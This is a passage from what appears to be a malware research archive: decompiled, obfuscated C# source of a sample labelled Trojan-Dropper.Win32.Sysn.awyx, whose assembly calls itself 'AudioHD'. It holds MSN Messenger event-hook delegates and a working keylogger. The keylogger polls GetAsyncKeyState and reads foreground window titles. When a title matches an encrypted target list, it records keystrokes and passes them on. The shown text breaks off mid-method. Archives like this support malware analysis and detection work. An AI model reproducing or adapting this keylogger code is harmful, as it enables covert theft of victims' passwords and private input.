+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0002([In] \u0006 PhoneType, [MarshalAs(UnmanagedType.BStr), In] string bstrNumber);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0003.cs

@@ -0,0 +1,13 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0003;
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0003([In] int hr, [In] \u0001 ePropType, [MarshalAs(UnmanagedType.Struct), In] object vPropVal);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0004.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0004([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMContact, [MarshalAs(UnmanagedType.BStr), In] string bstrPrevFriendlyName);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0005.cs

@@ -0,0 +1,13 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0005([MarshalAs(UnmanagedType.IDispatch), In] object pMContact, [In] \u0007 mStatus);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0006.cs

@@ -0,0 +1,13 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0003;
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0006([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pContact, [In] \u0001 ePropType, [MarshalAs(UnmanagedType.Struct), In] object vPropVal);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0007.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0007([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pContact, [In] bool pBoolBlock);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0008.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0008([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pContact, [In] bool pBoolPage);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/Token2000079.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token2000079
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0007
+{
+  internal class Token2000079 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0001.cs

@@ -0,0 +1,13 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using System.Runtime.InteropServices;
+
+namespace \u0007
+{
+  internal delegate void \u0001([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pContact, [In] \u0006 PhoneType, [MarshalAs(UnmanagedType.BStr), In] string bstrNumber);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0002.cs

@@ -0,0 +1,13 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using System.Runtime.InteropServices;
+
+namespace \u0007
+{
+  internal delegate void \u0002([In] \u0008 mFolder, [In] int cUnreadEmail, [In, Out] ref bool pBoolfEnableDefault);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0003.cs

@@ -0,0 +1,10 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0007
+{
+  internal delegate void \u0003();
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0004.cs

@@ -0,0 +1,17 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0004;
+using System.Runtime.InteropServices;
+
+namespace \u0007
+{
+  [Guid("01FE33C6-8FE4-4361-B32F-1F31AEA790E5")]
+  [ComImport]
+  public interface \u0004 : \u0001, \u0003.\u0004
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0005.cs

@@ -0,0 +1,260 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using \u0003;
+using \u0004;
+using \u0005;
+using \u0006;
+using \u0007;
+using System.Runtime.InteropServices;
+
+namespace \u0007
+{
+  internal sealed class \u0005
+  {
+    public \u0004.\u0002 \u0001;
+    public \u0004.\u0003 \u0001;
+    public \u0004.\u0004 \u0001;
+    public \u0004.\u0005 \u0001;
+    public \u0004.\u0006 \u0001;
+    public \u0004.\u0007 \u0001;
+    public \u0008 \u0001;
+    public \u0001 \u0001;
+    public \u0005.\u0002 \u0001;
+    public \u0005.\u0003 \u0001;
+    public \u0005.\u0004 \u0001;
+    public \u0005.\u0005 \u0001;
+    public \u0005.\u0006 \u0001;
+    public \u0005.\u0007 \u0001;
+    public \u0008 \u0001;
+    public \u0001 \u0001;
+    public \u0006.\u0002 \u0001;
+    public \u0006.\u0003 \u0001;
+    public \u0006.\u0004 \u0001;
+    public \u0006.\u0005 \u0001;
+    public \u0006.\u0006 \u0001;
+    public \u0006.\u0007 \u0001;
+    public \u0008 \u0001;
+    public \u0001 \u0001;
+    public \u0007.\u0002 \u0001;
+    public \u0007.\u0003 \u0001;
+    public int \u0001;
+
+    public virtual void OnGroupAdded([In] int obj0, [In] object obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnGroupRemoved([In] int obj0, [In] object obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnGroupNameChanged([In] int obj0, [In] object obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnContactAddedToGroup([In] int obj0, [In] object obj1, [In] object obj2)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2);
+    }
+
+    public virtual void OnContactRemovedFromGroup([In] int obj0, [In] object obj1, [In] object obj2)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2);
+    }
+
+    public virtual void OnIMWindowCreated([In] object obj0)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0);
+    }
+
+    public virtual void OnIMWindowDestroyed([In] object obj0)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0);
+    }
+
+    public virtual void OnIMWindowContactAdded([In] object obj0, [In] object obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnIMWindowContactRemoved([In] object obj0, [In] object obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnAppShutdown()
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001();
+    }
+
+    public virtual void OnSignin([In] int obj0)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0);
+    }
+
+    public virtual void OnSignout()
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001();
+    }
+
+    public virtual void OnContactListAdd([In] int obj0, [In] object obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnContactListRemove([In] int obj0, [In] object obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnMyFriendlyNameChange([In] int obj0, [In] string obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnMyStatusChange([In] int obj0, [In] \u0002.\u0007 obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnMyPhoneChange([In] \u0002.\u0006 obj0, [In] string obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnMyPropertyChange([In] int obj0, [In] \u0001 obj1, [In] object obj2)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2);
+    }
+
+    public virtual void OnContactFriendlyNameChange([In] int obj0, [In] object obj1, [In] string obj2)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2);
+    }
+
+    public virtual void OnContactStatusChange([In] object obj0, [In] \u0002.\u0007 obj1)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1);
+    }
+
+    public virtual void OnContactPropertyChange([In] int obj0, [In] object obj1, [In] \u0001 obj2, [In] object obj3)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2, obj3);
+    }
+
+    public virtual void OnContactBlockChange([In] int obj0, [In] object obj1, [In] bool obj2)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2);
+    }
+
+    public virtual void OnContactPagerChange([In] int obj0, [In] object obj1, [In] bool obj2)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2);
+    }
+
+    public virtual void OnContactPhoneChange([In] int obj0, [In] object obj1, [In] \u0002.\u0006 obj2, [In] string obj3)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, obj2, obj3);
+    }
+
+    public virtual void OnUnreadEmailChange([In] \u0008 obj0, [In] int obj1, [In] ref bool obj2)
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001(obj0, obj1, ref obj2);
+    }
+
+    public virtual void OnEmoticonListChange()
+    {
+      if (this.\u0001 == null)
+        return;
+      this.\u0001();
+    }
+
+    internal \u0005()
+    {
+      this.\u0001 = 0;
+      this.\u0001 = (\u0004.\u0002) null;
+      this.\u0001 = (\u0004.\u0003) null;
+      this.\u0001 = (\u0004.\u0004) null;
+      this.\u0001 = (\u0004.\u0005) null;
+      this.\u0001 = (\u0004.\u0006) null;
+      this.\u0001 = (\u0004.\u0007) null;
+      this.\u0001 = (\u0008) null;
+      this.\u0001 = (\u0001) null;
+      this.\u0001 = (\u0005.\u0002) null;
+      this.\u0001 = (\u0005.\u0003) null;
+      this.\u0001 = (\u0005.\u0004) null;
+      this.\u0001 = (\u0005.\u0005) null;
+      this.\u0001 = (\u0005.\u0006) null;
+      this.\u0001 = (\u0005.\u0007) null;
+      this.\u0001 = (\u0008) null;
+      this.\u0001 = (\u0001) null;
+      this.\u0001 = (\u0006.\u0002) null;
+      this.\u0001 = (\u0006.\u0003) null;
+      this.\u0001 = (\u0006.\u0004) null;
+      this.\u0001 = (\u0006.\u0005) null;
+      this.\u0001 = (\u0006.\u0006) null;
+      this.\u0001 = (\u0006.\u0007) null;
+      this.\u0001 = (\u0008) null;
+      this.\u0001 = (\u0001) null;
+      this.\u0001 = (\u0007.\u0002) null;
+      this.\u0001 = (\u0007.\u0003) null;
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0007.cs

@@ -0,0 +1,274 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000E;
+using System;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Timers;
+using System.Windows.Forms;
+
+namespace \u0007
+{
+  internal sealed class \u0007
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static \u0008 \u0001;
+    private static string \u0001;
+    private static string \u0002;
+    private static System.Timers.Timer \u0001;
+    private static string \u0003;
+    private static string \u0004;
+    private static bool \u0001;
+    private static bool \u0002;
+    private static bool \u0003;
+
+    [DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
+    private static extern short \u000F([In] Keys obj0);
+
+    [DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
+    private static extern short \u000F([In] int obj0);
+
+    [DllImport("User32.dll", EntryPoint = "GetWindowText")]
+    public static extern int \u000F([In] int obj0, [In] StringBuilder obj1, [In] int obj2);
+
+    [DllImport("User32.dll", EntryPoint = "GetForegroundWindow")]
+    public static extern int \u000F();
+
+    public static void \u000F()
+    {
+      \u0007.\u0007.\u0003 = \u0007.\u0007.\u000F();
+      \u0007.\u0007.\u0004 = \u0007.\u0007.\u0003;
+      \u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
+      \u0007.\u0007.\u0001 = new System.Timers.Timer();
+      \u0007.\u0007.\u0001.Elapsed += new ElapsedEventHandler(\u0007.\u0007.\u000F);
+      \u0007.\u0007.\u0001.Interval = 10.0;
+      \u0007.\u0007.\u0001.Enabled = false;
+      while (true)
+      {
+        string upper = \u0007.\u0007.\u000F().ToUpper();
+        if (upper.Contains(\u0007.\u0007.\u0001(865)) || upper.Contains(\u0007.\u0007.\u0001(874)) || upper.Contains(\u0007.\u0007.\u0001(891)) || upper.Contains(\u0007.\u0007.\u0001(904)) || upper.Contains(\u0007.\u0007.\u0001(917)) || upper.Contains(\u0007.\u0007.\u0001(926)) || upper.Contains(\u0007.\u0007.\u0001(935)) || upper.Contains(\u0007.\u0007.\u0001(948)) || upper.Contains(\u0007.\u0007.\u0001(965)) || upper.Contains(\u0007.\u0007.\u0001(978)) || upper.Contains(\u0007.\u0007.\u0001(999)) || upper.Contains(\u0007.\u0007.\u0001(1016)) || upper.Contains(\u0007.\u0007.\u0001(1033)) || upper.Contains(\u0007.\u0007.\u0001(1050)))
+        {
+          \u0007.\u0007.\u0001.Start();
+          if (\u0007.\u0007.\u0002 == \u0007.\u0007.\u0001(864))
+            \u0007.\u0007.\u0002 = upper;
+        }
+        else if (\u0007.\u0007.\u0001 != \u0007.\u0007.\u0001(864))
+        {
+          \u0007.\u0007.\u0001.Stop();
+          \u0007.\u0007.\u0001.\u000F(\u0007.\u0007.\u0002, \u0007.\u0007.\u0001);
+          \u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
+        }
+        Thread.Sleep(1000);
+      }
+    }
+
+    public static string \u000F()
+    {
+      int num1 = \u0007.\u0007.\u000F();
+      StringBuilder stringBuilder = new StringBuilder(1024);
+      int num2 = \u0007.\u0007.\u000F(num1, stringBuilder, stringBuilder.Capacity);
+      return num2 <= 0 || num2 > stringBuilder.Length ? \u0007.\u0007.\u0001(1071) : stringBuilder.ToString();
+    }
+
+    private static void \u000F([In] object obj0, [In] ElapsedEventArgs obj1)
+    {
+      foreach (int num in Enum.GetValues(typeof (Keys)))
+      {
+        if (\u0007.\u0007.\u000F(num) == (short) -32767)
+        {
+          if (\u0007.\u0007.\u000F())
+          {
+            if (!\u0007.\u0007.\u0002)
+            {
+              \u0007.\u0007.\u0002 = true;
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1084);
+            }
+          }
+          else if (\u0007.\u0007.\u0002)
+          {
+            \u0007.\u0007.\u0002 = false;
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1097);
+          }
+          if (\u0007.\u0007.\u0012())
+          {
+            if (!\u0007.\u0007.\u0001)
+            {
+              \u0007.\u0007.\u0001 = true;
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1114);
+            }
+          }
+          else if (\u0007.\u0007.\u0001)
+          {
+            \u0007.\u0007.\u0001 = false;
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1127);
+          }
+          if (\u0007.\u0007.\u0011())
+          {
+            if (!\u0007.\u0007.\u0003)
+            {
+              \u0007.\u0007.\u0003 = true;
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1140);
+            }
+          }
+          else if (\u0007.\u0007.\u0003)
+          {
+            \u0007.\u0007.\u0003 = false;
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1161);
+          }
+          if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1182))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1195);
+          else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1208))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1221);
+          else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1234))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1243);
+          else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1260))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1269);
+          else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1274))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1283);
+          else if (!(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1296)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1330)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1347)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1360)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1373)))
+          {
+            if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1386))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1395);
+            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1404))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1413);
+            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1422))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1431);
+            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1440))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1445);
+            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1454))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1459);
+            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1468))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1477);
+            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1490))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1503);
+            else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1520) || Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1529))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1538);
+          }
+          else
+            continue;
+          if (\u0007.\u0007.\u0010())
+          {
+            if (num >= 65 && num <= 122)
+              \u0007.\u0007.\u0001 += (string) (object) (char) num;
+            else if (num.ToString() == \u0007.\u0007.\u0001(1547))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1552);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1557))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1562);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1567))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1572);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1577))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1582);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1587))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1592);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1597))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1602);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1607))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1612);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1617))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1622);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1627))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1632);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1637))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1642);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1647))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1652);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1657))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1662);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1667))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1672);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1677))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1682);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1687))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1692);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1697))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1702);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1707))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1712);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1717))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1722);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1727))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1732);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1737))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1742);
+            else if (num.ToString() == \u0007.\u0007.\u0001(1747))
+              \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1752);
+          }
+          else if (num >= 65 && num <= 122)
+            \u0007.\u0007.\u0001 += (string) (object) (char) (num + 32);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1547))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1757);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1557))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1762);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1567))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1767);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1577))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1772);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1587))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1777);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1597))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1782);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1607))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1787);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1617))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1792);
